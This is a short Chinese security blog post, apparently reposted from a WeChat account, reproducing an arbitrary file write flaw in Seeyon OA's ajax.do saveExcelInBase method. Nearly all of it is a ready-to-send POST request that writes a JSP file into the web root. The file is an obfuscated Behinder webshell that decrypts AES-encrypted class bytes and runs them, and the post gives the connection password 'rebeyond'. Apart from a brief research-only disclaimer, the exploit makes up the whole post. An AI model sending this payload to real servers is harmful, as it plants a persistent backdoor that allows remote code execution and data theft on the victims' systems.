漏洞描述
致远OA-saveExcel任意文件写入漏洞复现
漏洞复现
POC
POST /seeyon/ajax.do;JSESSIONID=chat?method=ajaxAction&managerName=fileToExcelManager&rnd=12700 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: xxx.xxx.xxx.xxx
Accept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2
Content-Length: 94
Connection: close
managerMethod=saveExcelInBase&arguments=["../webapps/ROOT/test2.jsp","",{"columnName":["<%25@page import="java.util.,javax.crypto.,javax.crypto.spec.*"%25><%25!u0063u006cu0061u0073u0073u0020u0055u0020u0065u0078u0074u0065u006eu0064u0073u0020u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u007bu0055u0028u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0020u0063u0029u007bu0073u0075u0070u0065u0072u0028u0063u0029u003bu007du0070u0075u0062u006cu0069u0063u0020u0043u006cu0061u0073u0073u0020u0067u0028u0062u0079u0074u0065u0020u005bu005du0062u0029u007bu0072u0065u0074u0075u0072u006eu0020u0073u0075u0070u0065u0072u002eu0064u0065u0066u0069u006eu0065u0043u006cu0061u0073u0073u0028u0062u002cu0030u002cu0062u002eu006cu0065u006eu0067u0074u0068u0029u003bu007du007d%25><%25u0069u0066u0020u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u004du0065u0074u0068u006fu0064u0028u0029u002eu0065u0071u0075u0061u006cu0073u0028u0022u0050u004fu0053u0054u0022u0029u0029u007bu0053u0074u0072u0069u006eu0067u0020u006bu003du0022u0065u0034u0035u0065u0033u0032u0039u0066u0065u0062u0035u0064u0039u0032u0035u0062u0022u003bu002fu002au003fu00b1u004bu003fu003fu003fu00b1u00b5u00b1u004bu003fu0033u0032u00a6u00ecu006du0064u0035u00adu00c8u00aau00bau00abu0065u0031u0036u00a6u00ecu00a1u0041u00c0u0071u003fu003fu00b1u00b5u00b1u004bu003fu0072u0065u0062u0065u0079u006fu006eu0064u002au002fu0073u0065u0073u0073u0069u006fu006eu002eu0070u0075u0074u0056u0061u006cu0075u0065u0028u0022u0075u0022u002cu006bu0029u003bu0043u0069u0070u0068u0065u0072u0020u0063u003du0043u0069u0070u0068u0065u0072u002eu0067u0065u0074u0049u006eu0073u0074u0061u006eu0063u0065u0028u0022u0041u0045u0053u0022u0029u003bu0063u002eu0069u006eu0069u0074u0028u0032u002cu006eu0065u0077u0020u0053u0065u0063u0072u0065u0074u004bu0065u0079u0053u0070u0065u0063u0028u006bu002eu0067u0065u0074u0042u0079u0074u0065u0073u0028u0029u002cu0022u0041u0045u0053u0022u0029u0029u003bu006eu0065u0077u0020u0055u0028u0074u0068u0069u0073u002eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0028u0029u0029u002eu0067u0028u0063u002eu0064u006fu0046u0069u006eu0061u006cu0028u006eu0065u0077u0020u0073u0075u006eu002eu006du0069u0073u0063u002eu0042u0041u0053u0045u0036u0034u0044u0065u0063u006fu0064u0065u0072u0028u0029u002eu0064u0065u0063u006fu0064u0065u0042u0075u0066u0066u0065u0072u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0052u0065u0061u0064u0065u0072u0028u0029u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0029u0029u002eu006eu0065u0077u0049u006eu0073u0074u0061u006eu0063u0065u0028u0029u002eu0065u0071u0075u0061u006cu0073u0028u0070u0061u0067u0065u0043u006fu006eu0074u0065u0078u0074u0029u003bu007d%25>"]}]
冰蝎连接rebeyond
原文始发于微信公众号(小白安全工具):致远OA ajax.do任意文件写入复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论